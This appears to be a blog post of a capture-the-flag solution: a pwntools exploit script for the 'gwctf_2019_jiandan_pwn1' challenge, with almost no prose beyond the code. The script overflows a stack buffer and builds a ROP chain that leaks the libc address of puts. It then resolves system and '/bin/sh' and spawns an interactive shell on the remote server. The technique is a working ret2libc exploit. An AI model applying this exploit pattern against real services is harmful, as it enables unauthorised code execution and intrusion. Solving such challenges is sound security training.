040-gwctf_2019_jiandan_pwn1

EXP

from pwn import *                                                           
from LibcSearcher import *                             
context(log_level = 'debug',os = 'linux',arch = 'amd64')

#sh = process('./040-gwctf_2019_jiandan_pwn1')                                      
sh = remote('node4.buuoj.cn', 27858)
elf = ELF('./040-gwctf_2019_jiandan_pwn1')

pop_rdi = 0x400843
puts_got = elf.got['puts']
puts_plt = elf.plt['puts']
main_addr = elf.symbols['main']

payload1 = flat(b'A'*0x10c, b'\x18', pop_rdi, puts_got, puts_plt, main_addr)
sh.sendlineafter('fun!\n', payload1)

puts_addr = u64(sh.recvuntil('\n')[:-1].ljust(8, b'\x00'))
print('[+]puts_addr: ', hex(puts_addr))

ls = LibcSearcher('puts', puts_addr)
system_addr = puts_addr - ls.dump('puts') + ls.dump('system')
binsh_addr = puts_addr - ls.dump('puts') + ls.dump('str_bin_sh')
print('[+]system_addr: ', hex(system_addr))
print('[+]binsh_addr: ', hex(binsh_addr))

payload2 = flat(b'A'*0x10c, b'\x18', pop_rdi, binsh_addr, system_addr)
sh.sendlineafter('fun!\n', payload2)
sh.interactive()
上一篇:FireEye红队工具遭盗取,腾讯安全已检测到数百个符合规则的利用样本


下一篇:[GWCTF 2019]枯燥的抽奖 1